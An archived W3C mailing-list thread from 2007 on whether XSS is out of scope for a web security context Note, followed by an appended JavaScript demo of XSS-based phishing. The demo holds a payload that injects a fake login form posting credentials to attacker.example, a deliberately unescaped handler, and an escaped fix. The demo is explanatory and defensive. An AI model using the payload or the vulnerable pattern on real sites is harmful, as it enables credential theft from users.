RE: XSS out of scope

From: Dan Schutzer <dan.schutzer@fstc.org>
Date: Fri, 6 Apr 2007 10:39:12 -0400
To: "Mary Ellen Zurko" <Mary_Ellen_Zurko@notesdev.ibm.com>, "Shawn Duffy" <sduffy@aol.net>
Cc: <public-wsc-wg@w3.org>, "Close, Tyler J." <tyler.close@hp.com>
Message-ID: <013401c77859$58b30c20$6500a8c0@dschutzer>
I don't think this should be out of scope; some of our solutions address how
to mitigate this. And some of our suggestions for strengthening the Browser
also help in this area.

From: public-wsc-wg-request@w3.org [mailto:public-wsc-wg-request@w3.org] On
Behalf Of Mary Ellen Zurko
Sent: Friday, April 06, 2007 10:11 AM
To: Shawn Duffy <sduffy
Cc: public-wsc-wg@w3.org; Close, Tyler J.
Subject: Re: XSS out of scope

I think it has to be. But could you offer up a scenario of what we would do
if it wasn't, just so I can be sure? (or maybe someone who's sure will
answer).

Mez

Mary Ellen Zurko, STSM, IBM Lotus CTO Office       (t/l 333-6389)
Lotus/WPLC Security Strategy and Patent Innovation Architect

From: Shawn Duffy <sduffy@aol.net>
Sent by: public-wsc-wg-request@w3.org
Date: 04/05/2007 10:44 AM
To: "Close, Tyler J." <tyler.close@hp.com>
Cc: public-wsc-wg@w3.org
Subject: Re: XSS out of scope

Does this also include phishing that is only made possible via XSS, such
as a "trusted" site that has been injected with a fake login form via
XSS?  Is that also out of scope?  Just want to make sure I'm clear where
we're drawing the boundary...

Close, Tyler J. wrote:
> I've added a new Out of scope section to our Note to cover XSS attacks.
> See:
> 
> http://www.w3.org/2006/WSC/drafts/note/#XSS
> 
> This edit addresses ACTION-160
> 
> Tyler
> 
Received on Friday, 6 April 2007 14:40:01 GMT
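The scenario Shawn Duffy raises (a "trusted" site carrying an attacker-planted login form via XSS) is worth seeing concretely, because it is exactly the case where browser security indicators tell the truth about the origin and still mislead the user. The following is an added example, not code from this thread or from the WSC Note; the hostnames trusted.example and attacker.example, the function names and the payload are all constructed for the demo. It builds the link a phishing mail would carry (the address bar and any certificate indicator would name the trusted site), runs it through a handler that reflects the query parameter raw, and then through the same handler with HTML output encoding, which reduces the injected form to inert text.

```javascript
// Added example for the XSS-phishing scenario discussed in this thread. Not code
// from the WSC Note or from any poster. Hostnames, function names and the payload
// below are constructed for illustration.

// Attacker-chosen query string. The injected form posts credentials to the
// attacker's host even though the page itself is served from the trusted origin.
const PAYLOAD =
  '<form action="https://attacker.example/collect" method="post">' +
  'Your session expired. Please sign in again:<br>' +
  '<input name="user"><input name="pass" type="password">' +
  '<input type="submit" value="Sign in"></form>';

const TRUSTED_SEARCH = 'https://trusted.example/search'; // constructed endpoint

// Builds the link a phishing mail would carry. Everything the browser's security
// indicators can reflect (hostname, certificate) genuinely belongs to trusted.example.
function buildPhishingUrl(base, payload) {
  const url = new URL(base);
  url.searchParams.set('q', payload);
  return url.toString();
}

// Deliberately vulnerable handler: reflects the q parameter into HTML unencoded.
function renderSearchPageVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1>` +
         `<p>No results found.</p></body></html>`;
}

// Minimal entity encoding for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed handler: same page, but the reflected value is encoded for its HTML context.
function renderSearchPageFixed(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1>` +
         `<p>No results found.</p></body></html>`;
}

// Stand-in for the server: parse the request URL and render with the given renderer.
function handleRequest(urlString, render) {
  const q = new URL(urlString).searchParams.get('q') || '';
  return render(q);
}

// Crude stand-in for the browser's parser: list the action URLs of any <form>
// elements that made it into the markup as real tags (entity-encoded text does not).
function extractFormActions(html) {
  const actions = [];
  const re = /<form\b[^>]*\baction\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) actions.push(m[1]);
  return actions;
}

function demo() {
  const link = buildPhishingUrl(TRUSTED_SEARCH, PAYLOAD);
  const vulnerableHtml = handleRequest(link, renderSearchPageVulnerable);
  const fixedHtml = handleRequest(link, renderSearchPageFixed);
  return {
    displayedHost: new URL(link).hostname,          // what the address bar shows
    vulnerableFormActions: extractFormActions(vulnerableHtml),
    fixedFormActions: extractFormActions(fixedHtml),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running the block prints `trusted.example` as the displayed host in both cases; the vulnerable page carries a form whose action is the attacker's collector, while the fixed page carries no form at all. The browser-side indicators this group works on cannot distinguish the two, which is the substance of Shawn's question.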
